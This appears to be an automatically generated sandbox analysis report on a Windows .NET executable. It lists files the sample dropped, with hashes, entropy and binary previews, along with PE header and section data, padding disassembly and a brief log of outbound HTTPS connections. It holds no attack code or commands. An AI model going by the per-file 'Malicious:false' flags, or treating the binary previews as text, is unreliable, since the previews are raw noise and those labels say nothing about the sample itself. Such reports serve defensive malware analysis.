...[..Y...^.....a'/W=..a.pTG.T.{.V8`..|.......E........I.p.....Wi@...-cn.../F{5<A..{v.p..o.?......Hd.C....U.~...>.qY.7E=.r.......qrN.5.9.Z2..C......y-Gq...#\..a.4a.....U].N.LE..xK..U""....(>...Q.Q....tj#....7~......6.W.F.....M^.......t....G....mc.m.v...>.R._..U......O.E...~.S.?........7-9.C."4%...J.T......o6E.).S..%Wi...%.^gwy.c...9..C&.$......j.,6...[.8.r.x...Cp.....Z.............|..k.........Z..@&/...p.n..fj%......0.2e........:....X5.8...UO~d.'8...ox..Zw..KU.9.]*...h.6..'......?,
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.790889047525584
                                              Encrypted:false
                                              SSDEEP:24:/Gkz8WsT2HuFYJTZM8JagFGs+cKClWd9LKz2NAQ6Ro+/q:horT2OFYJTZxUg47cEddK6AQ6KUq
                                              MD5:4613C6CE85335878DB185DA33F9E6D9B
                                              SHA1:58141A4108F13BA02479376C61512F11E6987E00
                                              SHA-256:A3C5EAF6E3B7FA84A9CCE36F6657335EB4661A39DCB4391746F1020D201DB038
                                              SHA-512:DECEC2ACCFC1836A69FF4A0F3643E5B657E2E397590748380550E85C28D13C93AF3E75FFDDD4F5EE9670418A334D8A100933A5C0C634F33D8FE4D60E6388E008
                                              Malicious:false
                                              Preview:..h.9./Z....#R.......l...L.l.r.Hn.....].cv.e....{./.%...~....v..N...[*7....a.u.F4..v%.|...a.ued.z7.(...$i..x0J..W....c..z..../..}.....&H.J...-.&..up}...h.....^.......i...e._q.3..%.*..f......" .|&..*...jM.#+.7.e.<..o.sE~....l.%......bp....yi>.t.........F..e...~...bD........1..*..a.[...dZ..#...W.f.{.......e..i.........h\..y...P{...U3...qo...C..."G.U...d:2~..z.e......l.n_r..|$.7.k....Wo6V...<.....a.K...uA.e.9.X.o.<.hV.s....F..2.>.6V(..PNz.2#......{..z$....#.`G[N...qR.....fr.8.6S...T.z.x[..C-.v.u....Q.=.. ..4U..u.............}...K....h...y...zq...&7.L_]u$/a.....x..e..<.h...,u..S/.|u3..9..KQX{.7:.LI...z.<.....,;.....@.f3=.._.cG.eh}...4..r/.....:...I..N.K.lh.b.%..N.W.?.. IF.......?t.......>...9........z..l..,\......Zwp...Kz.T@6T..v.....Qif..wx.'...u..~.Xj.c.....?Tc....gD........I...._.....I.Q.`..8.gp..y._...|.%.._....QVkr.h.t...'...7...iz.E^.oY.[..P.<V.PhW.JK...N......>M^D{9....)L.{...%..F......&.9.3..~....=k.4..v..G.....K. c.p;.3p...'....N.U.
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.802415498012615
                                              Encrypted:false
                                              SSDEEP:24:rlokhqk3Z7t9miIzqlrqng7+43u8hAAVZmFTkU1RZSyWtc6:uqqknE7zlWBeAVE2UjZSVG6
                                              MD5:BC234FAF3060773D84DCABBE73AF64CF
                                              SHA1:3C4D9675DB6C0A7EC047939AFA5E62FEA71127A1
                                              SHA-256:E101C5207C900D89F1364F5BF4E8B630BCD23E9045B5BB03A7B9B8A5F0A78272
                                              SHA-512:5CF06DCCD4F939F06856806B68A403AEE980FD46AB0DF868B4679705C5A098E206D46434CE3343CF95B2988BDA3CF3B915AA54BDB65BC16B5B38C16B5ADB9000
                                              Malicious:false
                                              Preview:..D..:Mj..B.H.E.j..*.P......o.I0C....p...0..`.-..i.y2..&.Y..UC.)V.__..m.W.D..?.}7...C#.....-}.'.9M.%C..O..iC.t.<.s..S....qdf-.|..5.\.S4.Y#.....|..Njd!Z3.1S...|..*...]]....+...{..D.r.Q....V....C.ar..R..O]v.4b..M....Y...>.h$..Z..R........`...Rgf.s...`v%.O.D..#...5........t.z.......Lm...-Y........W.<.7H.HG..N.2.N.KC,T.7..4\....).,9o.Y...2.........L..g;....j.D"....8...n...s.........C...z{..... ..xbm$.c..k..\0.9Ti.=..4.c....%.:.A....R.B..x.e.HZ;....&.nU..).IFD.2 ....[t..4..L..Ov|.\....e.f...N.. ..K.V.InY....a.....g....7.O.}........~3L.h.#.....I....{.......S9..8`..%.m....)........Zk..z.&.).f..l......'.S.S.z4_t..FGEg.[..GUo...v9.RJJ8......-.<P.*g....g....K=I.){@.x`wu..kVr|.6.n'...<.....(.N4....m.)....o7K.i6..........UI)H.%..8....t.fL........*.,.[..{k0...B.u.....p!.1......"...x.Q.r`.z7f...j*.'..`g.Y...#1..^....w.q..T.u...e.-.*k..z...........B.4.......".~8;.tvj+..0 ..........`@Q....a.2.x..!&...^F{Z. "......S'@.<.'...|.'k....9.q..i..:
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.810112335394133
                                              Encrypted:false
                                              SSDEEP:24:oooiezBGPnaLKrMM8ebwFGvdrkTsLhnbf8Em8nlJn:oBzBGPnC7yvUAYEbld
                                              MD5:2D58F2AE6F0B8D824E1219E6C1FF78AD
                                              SHA1:BB7602B1D612E3FDEDD6A34FADB7A767309325B8
                                              SHA-256:C1C9EAA4D3ED4374368EA201324109FF08D9A98641982DDA5BC9CCAD9BAEC726
                                              SHA-512:7DFC904C33F39BD3BE498416FFD13CE6BFF77A03D113C02F49A91F00001034C95ADBED85C424516D43A1F0390FF767A24943DE2AD09EAD7F2D08A6ADCEB43F33
                                              Malicious:false
                                              Preview:....R..R....=O....<..PD....zo....,QgF.(.......v.(.J..u`..s.]....Fm...f.9".+4...'.q....\..6g....|.e&.S...~%...@;u.y.....d....i.a..P.p#.A/...b+...q....x...h..Z..?.......{...~..O...].....eh!LLEJy.........`Y.r.4b.S.?.o}.q....._....G#0..p..YEP...@......@........Y...L.....D.K..8q7.N.;Y..*..r..:.......L0...nB9.x.L.+3.)......k...{g.6E..gD...^..(.M.:s..+o/...b.f..e....V....F..Kj+D....r.O...3D.A<...&y.!.o.g...V...$Y...0iUQ.. .*k.......Ot.]..C..L.^'{.";....;8t..z...."q.&.)..P(Y#.g(.Hf.Y!.2T.w........ }....r..L0.&.......E.k{..za.1...........`.Q(..o.X.B..QkX.O..."..6u...../.9....`.3...x...._r{ .2s.....U.{."4h...G...%.+.."..*...6......;.9...rp......O.U...[aoQ.~@.!..x].2.I.p]H...L..h.....*.-......lS..6c-.2o..0}O.....L..h......m..h#.i.t....pQ...X...v2$...%.....V...H.V.Py...m..]....:.&..n.....lC...<..bo9/q...i.M.<....&.E~B..#...r.....^.\X\R.%..Z..&..7}#...#.. ..z8......kW...e7x.!}..PL..}.D.....fy.f...X........4..$%@..R.,.%F....b-.....\.O.O....X..._..s....Y
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.796327833832058
                                              Encrypted:false
                                              SSDEEP:24:vt4F8L70hkxVYDR7vU/KZO625Q4KFXZM9oDM+dS6HAldJ6:vtq2TYDV8/KZOL5QtBZMX+rydJ6
                                              MD5:0CD1FCF71863249B4F4D348208421D38
                                              SHA1:AE7FED0BB5C5B4A97006615BE546068C6F244769
                                              SHA-256:4435FEA70F969D6EC3C025DA80BF626B795B7E3DE4EE713E4769F75094A747D9
                                              SHA-512:C44D64806803BBB911B1C7036D27F690124AFB3A84734800F2EEA8608D0715946FD85C4D1351A745BF28B3D0F9395D059A18A441928AF776C9DF1CF562462E80
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.837404622525821
                                              Encrypted:false
                                              SSDEEP:24:9P0TjbC7CLq7vffJtlnA6QbFQ7grtNIq9ooxK21B1rZVyYWp/JcXb6triD:B0TjcAqJjnWbbtqq94G9CZpxYbt
                                              MD5:CC2DED2CB78E960D30F817B441166E9B
                                              SHA1:232EC06AEAC50334F1A22C6523FCF4F11340E6FA
                                              SHA-256:210E92CD064C0DBDF0006A34C127540742575132D9E45E55D19A2EE88B1898BA
                                              SHA-512:1982D2CBCE5FB563CBA736257FFDC5D565BEB3865D72A1C48AEB48AEFC93534AACBB271C37A122E746DA279A182B6378C2A80DA6771459CADF91CC3606BB68B7
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.8086087157940405
                                              Encrypted:false
                                              SSDEEP:24:0LWxiRs45k0j34YqL/F7bicuZiceM6/VAJpd9iMtqmLAn:0LJ5z3ABlcebtWREHn
                                              MD5:F7D77BAD37ADFF5E77F502657EE8364F
                                              SHA1:0390814BAA3872CD10E6D742B8C18E5BBA1B809E
                                              SHA-256:E7C81637EF75662271BE2DA166A420D59C1BB4D6CC8BBBD4FF4D89543FC1722F
                                              SHA-512:CCE1BE67FBD5BC32091747D4DD1814CD2399AAA898589FE0862041D5ED0F076DF0D9C5C1812BFA56C83B32A2DC5D75E1694533B7057521906C0AD7B5FF1B52DD
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.804110408504276
                                              Encrypted:false
                                              SSDEEP:24:5AqxT7pmrhykULFIS2ySaSayDqV2aSctHpvY4tW8aL9binmVg:CCTdmg5LFz3jyI2ahJg4tWlwm6
                                              MD5:5AB3C7295DF25695C3F16AED3DABC16A
                                              SHA1:9931D7AA5982C3E47DF13BF3993CDCC68033EEAE
                                              SHA-256:EF31691DB41F48F78C6E12166A9A0AAB19C0AB701DDD017A91D93EA8916673DE
                                              SHA-512:BEEE163D397997A512DBBB2EBCA6506C9356BD963562543EF4ECF27B7F717E258ABB8CD3AFD7C9C6C20878CCE3A3EFC9C13842A4EEB8F81F8A694F5CBD9402AD
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:PGP\011Secret Sub-key -
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.804447378961386
                                              Encrypted:false
                                              SSDEEP:12:zNeCJJULn9hB/1urwZ5UQxYc+QsdN3i5/gAPcIdS30/THNIszoWKX4EyJy2vVsSl:l+n9hBturMVYamg5ogI0Wsz/EqVGCoC
                                              MD5:C404BEBA670D917EB14E7008132F6883
                                              SHA1:B4D1B744E9C59F40D66256CA795C529C89DDD322
                                              SHA-256:B698C1400DBD9902AC0CFA89019713724FC9D943B6AC869097288A7FE06F9E03
                                              SHA-512:16EDC3947FBE61E84C635956AAE019E9A7F19C03AA9B0C940A1F4372F58DC9803C460F689096D8880E102913F45BF5A595AD7F2371D2258B6B50D5D7EB91D418
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.827360833598283
                                              Encrypted:false
                                              SSDEEP:24:cHQoQJ1pwKtYqYWDv38DfA70KQOoll1HClMTwl5:cHyJrdtURDodgdE/
                                              MD5:0EADD47980305217E3898A099502515B
                                              SHA1:5D8506C4BBFA65827C6D89FC6E2F0E8B80DC6F92
                                              SHA-256:90AAE89CA905BE071F5C6BF3BDF62FBD9BE56E929550DCECFB8AB656FB59DFF6
                                              SHA-512:DFB0861EA19435D1EE77AAEA03B9380E38F7B2D622622EBA672D5923656EB9FE0657F57BA70BBA4960FB9D2E5EF116CCBE61BB71CE5F4B092E80D8525B83B4EC
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.787747393591855
                                              Encrypted:false
                                              SSDEEP:12:+cn5486UlNnRP7qn5MSg08o5oTODIith/EDaUZDYMIKBXtuNDeNufyrFM79GOCji:+grlvjgJryW/4amDYO4ariRJtRooZ
                                              MD5:7E330D97340BF1EA99FEF331E18D86D0
                                              SHA1:DF1AB374113D9F8EF649D2A8236D3E6E641DE62B
                                              SHA-256:7C1168D78FC9D40DF1D02D39875EB9409AC69E689CBCE98E4DDCC82574BED1B6
                                              SHA-512:136922F315327E60011D2EC0487BC6BD85AEF116248B5D1D68C2B704075B1DF1D37ABE11C25CB7FB337FDBC0FE29ACA3658B3585E0D2E872079859500088C6F9
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.822549443571841
                                              Encrypted:false
                                              SSDEEP:24:XDD2ic998o2x/FtZDBx2EIZi25fWH67i9YGox:XD9c998JxNlQEU546W9Yf
                                              MD5:1CE722FC89FC199371398188FAC56832
                                              SHA1:E3A2D35865DAA99078EBF4DC27A88B80A1B69E76
                                              SHA-256:3A08FAC7EE4AB773FDD46D311E3C2A0CCEB06271598B118D1EDB86FD854C62CC
                                              SHA-512:EE72C66A06EA8E90A446EAAB68E0D1A2F768DCC35BA6440D50BEB205913ADF2E502E1236B19BA652CDE66D86DE8F21B347212640318BB27368B0C24AF7D7448C
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.818608510132549
                                              Encrypted:false
                                              SSDEEP:24:ak1iMA5ovdBaY27MKwFrH4XmOPHsqK9zmEk8ykzhkYm/:akBdP241FrH4XmOPGY8BhkX/
                                              MD5:FBE1DE97970B6BA7A4A545B4B9B156E7
                                              SHA1:BCB6FB106AFAF48A3229F99CD2EB99453E83BDD5
                                              SHA-256:942F8E3B6BFD2E2FFBE576C4EC9CB99895C767EF236666F2F4DDD9965D15AAA0
                                              SHA-512:EDAEBA63F71C86FD141EE62F9C4F465659A1EB007DA45CBB6D7C858E62577AAEEE9318FA2A506D2B3AA2093EE67A33760BAA09D14C2625BE91C849C02D47D45D
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.8179425455904745
                                              Encrypted:false
                                              SSDEEP:24:BaJtTxIrZMnOCX2nzj+GD/OuxpnCrCl/iqcO6vVj9i3GDwWs4s/eV:Bar1OMnOCozmuxpgCl/ihO6DxEWsv/eV
                                              MD5:55C5C44D79FB2AE7537464ECB1172286
                                              SHA1:FFAC41297A7C19D1F3B499795357A05C6CE91129
                                              SHA-256:56092D6FDB6AEAAA78EA5FF62BA929969BA86C8D51F6BBC985EF8F1EA2310E26
                                              SHA-512:5C95EC342DC1E57EAFABA1822AB8239F35A601DBFFF4B8E20ECBAD8073EAFB67F23760732D2E864F5C7964F1C82AF3AB7A41572D5F1CDEBADB6B999AA68606E8
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.793272271736592
                                              Encrypted:false
                                              SSDEEP:24:sC5uhhoxQhkq9Om0P6jmsTcOM+KOp3aQ60EMrt9N7:FYhMQWU7s6ysTloOQQ60R9N7
                                              MD5:1700C1E331CFC85BE6807F0F5DFB5FA1
                                              SHA1:A10A96B3EB7C0A82FC98A7FFE019C2A5EBC06773
                                              SHA-256:CB71137BEDE81064B07B738BE34755E0F6DAB78FCFF737AF549DF9468654F687
                                              SHA-512:B62A7E055ECFBDE6B5288F479E1F7F4D27F7727DF155853111C7E0EABCC143BF192D2442340300458FB3C5D36C438218CC78B0F44B302CA490EFF1C9ACBC3E98
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):1072
                                              Entropy (8bit):7.81365096710166
                                              Encrypted:false
                                              SSDEEP:24:MCy5ZJLVuszIQt064LWwRM7hfmVPsT4SfuVWwmnd6:MrLV7r0645R+gd52uDmnQ
                                              MD5:F12953595B3C3125F79EAA30206A9F0B
                                              SHA1:CAB38CD9F436FCA814D0016F5384DB91E27BA5AD
                                              SHA-256:60AB6E53E7C434125444AEEA650B0A16080EB40904AF44E02D23F24FFE3B23F1
                                              SHA-512:FA12DD4E7AAA3329920F15D1FC3FC9566071EAB8A171DE57D20C0E268575E1DE9EFE00DBE37546F41D16469EF67E3F0F95A16A7FFF43F5E00EDA00DEB7BC86B5
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):448
                                              Entropy (8bit):7.441710748148304
                                              Encrypted:false
                                              SSDEEP:6:9CudHgt9DcIlsjKsFKtqnOd2o0oX+a338wdrd6W9Il95d3leYK4dcTX9ugi4Mgmi:TO9DdsesFKIOqouaHhLQb5d1LKlTFiBA
                                              MD5:F1155AC811D581D73E9D3E171BE8D125
                                              SHA1:539BCF53A3C9E5A4816F1BF128AD3BDCCAF25185
                                              SHA-256:59AD74F4ADBB02336570C82E85CFB6FEEC8BD046D6090FF37D6BC9FA4A0210F5
                                              SHA-512:AF4822869866D596DC494335DEBE4B6940A08919893CB279528A7087745E34A5406A81574C236BB10ED1BF8A741BCF72A9765805273DC091892DD70ED4D43F5A
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):544
                                              Entropy (8bit):7.601044312232493
                                              Encrypted:false
                                              SSDEEP:12:Lb2NEhDhup5DL6gY0Z1cs+qL5F/N8N98XYXtZD9KaE06EcAUVkw:n2adaL6gYpsfLXFc98IX3RBLcVVkw
                                              MD5:FD678875BF0C8042583CAB243DCC6C28
                                              SHA1:06F601AF048F61C5C7CDD65916FD2781793FECC2
                                              SHA-256:E74C409B67572FBF94014C5ACBA83A4A9402454E366B8DABE670AD5E1B09EE9B
                                              SHA-512:57CDE2AEF64FE4E37EF504289E6F546B2F0B4D013D1932BECCAFECCCEA63C832EA67A12F974CEFDA93006A55237BC6BDFAC487A32C1BF3E7E849FA0CCBA0D41B
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):224
                                              Entropy (8bit):7.076044486664172
                                              Encrypted:false
                                              SSDEEP:3:wBQfTdPfXesMfapqS3X0X6RS2Fzicu9QbGJqFZoWwvk44/tfVeKXyrct3lKil7AN:wB853eso0u6DFuH9SMqFCWwb4VfteilC
                                              MD5:4FA28B2913804CFB19F0DAAB6F51A93A
                                              SHA1:A9AC6C4B6B0AFD182946A240A7B88F58FD922FFF
                                              SHA-256:B13B6EA71B833F4AFBD97BF585EE8FDFC81634CE6DEBE722275E0EE77C351E8B
                                              SHA-512:3E987B63BEC36A54D7BF37411111DE50E792A7EF32E67E78F7CDB1D04CE4A933DC638155B40A723CD158F43E7CB2B285598533FF85623BBBEEAB2296D6A2A792
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):544
                                              Entropy (8bit):7.602035386002605
                                              Encrypted:false
                                              SSDEEP:12:n6OsdziobjDgtTgAQ/guPw6GLnQokkxNXvI778wUA6C:n6QoHDXaf6GLnM0+78w2C
                                              MD5:F6D37136A4EBA64C55A4E087F3150586
                                              SHA1:BCE418AA58D5019B1938B7FE3C4717F9F5988388
                                              SHA-256:AB4FD61EC14037752B7C034F666ACD13481089B75628863599B0234502F6481F
                                              SHA-512:D7831750B268EE0BF46E43C6CD06F0D8624C3F0C4B4C53138682D5BD82FCFEF70546A52CF61FBB5C8245B61F9692A575B5EA2658D6C3E1235949DC7F17C1043E
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):544
                                              Entropy (8bit):7.570843099837511
                                              Encrypted:false
                                              SSDEEP:12:9IAVEpHxJ3k+frD5Pu41RaL78TvyX9ozEXU8TaMZG:y1Jdf5jsnFX9ozENaMZG
                                              MD5:E3479A70F29E4B84AA8C38F1F4C5B5A8
                                              SHA1:359D2BB14666CE655BDC06B868A780E076724FA6
                                              SHA-256:D19A39362B3481D0D7DF8B2AAC13F21D2AE81F170989E8FA7A6EC8F22F7559C8
                                              SHA-512:EC39ED75278616026607E1BD4961C3C74866DCC0A10E91DB32ADCABDF26D0ACFA7B95035247ED63121089C3643CEF209B9D7CA97FA1582E4D0F1CEF717F8F354
                                              Malicious:false
                                              Preview:...\.m .*.&.u...S\.Yh.j.QK:...v.o.-...2...;OX(..{t.i._+$e.H&<.a.....RXHNx..>..<.a..i.-.6........`.0..NW..A..n...\.9....=6. .....{.T.I:w...L....-.....K~FS.[.48%(...:.(..+.....O...kWx.3.<d....o*....2.m.....q...}..9Z......{..1.).....%..(...~.j...iW....>uk..&........^.vN.j*cfYa.....J....hv~..$e-u>~.C....w.RAy.S .<W.z..E9?9.. .a..p...=mcq.n..B$.x.M.T.Pa....;;O..d.....|...o|..0.'.o.....w.h1Jy|.k...:<..P.df.#...}.....t=....$..i.hC.k..=.5D.(/..wR;....Q..q....N!h%)...v...._.1.h.Q..x..~;.h...{.....i./F.....A.2...J..]P.
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):5.358315076253311
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:12057ad2.exe
                                              File size:62976
                                              MD5:716bf12f1b7b6b04f1acf6f8ae1eb4bb
                                              SHA1:c172a657fd1a8759beccff5b144f1cb20033008a
                                              SHA256:9e801ce8af98b3c03423f3f9b3d9b2f36aad15a63f21523210a9517f12057ad2
                                              SHA512:0c9db0f2cb081e4d44095be6d71c2aa9967b45af9ba6676ccf8775b918c53c4bbd291315f3970ee71428cea0bc694f2b5f87fd6ba883bc401767fb094354db7d
                                              SSDEEP:768:sKsMqCXfVcWOWM9ZkiANIUcmsYLDwUzc80gmq3oP/oDj:sKsebM9ZkiAPcYr/0O8/on
                                              TLSH:9953542852738A2DC47C82B815FB2F7C27B0AF566460C75D4A78D2AC3F277B68D10B56
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{"..........."...0.................. ... ....@.. .......................`............`................................
                                              Icon Hash:00828e8e8686b000
                                              Entrypoint:0x410bbe
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xEB227BDA [Mon Jan 3 15:08:10 2095 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10b69 | 0x4f | .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12000 | 0x5dc | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xc | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x10abc | 0x38 | .text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x2000 | 0xebc4 | 0xec00 | False | 0.4072927701271186 | data | 5.421045147068128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0x12000 | 0x5dc | 0x600 | False | 0.4205729166666667 | data | 4.14746742020054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0x14000 | 0xc | 0x200 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              Name | RVA | Size | Type | Language | Country
                                              RT_VERSION | 0x12090 | 0x34c | data | |
                                              RT_MANIFEST | 0x123ec | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
                                              DLL | Import
                                              mscoree.dll | _CorExeMain
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Sep 25, 2022 06:46:26.740273952 CEST | 49699 | 443 | 192.168.2.4 | 54.91.59.199
                                              Sep 25, 2022 06:46:26.740312099 CEST | 443 | 49699 | 54.91.59.199 | 192.168.2.4
                                              Sep 25, 2022 06:46:26.740426064 CEST | 49699 | 443 | 192.168.2.4 | 54.91.59.199
                                              Sep 25, 2022 06:46:26.808121920 CEST | 49699 | 443 | 192.168.2.4 | 54.91.59.199
                                              Sep 25, 2022 06:46:26.808173895 CEST | 443 | 49699 | 54.91.59.199 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.104156971 CEST | 443 | 49699 | 54.91.59.199 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.104299068 CEST | 49699 | 443 | 192.168.2.4 | 54.91.59.199
                                              Sep 25, 2022 06:46:27.126401901 CEST | 49699 | 443 | 192.168.2.4 | 54.91.59.199
                                              Sep 25, 2022 06:46:27.126431942 CEST | 443 | 49699 | 54.91.59.199 | 192.168.2.4
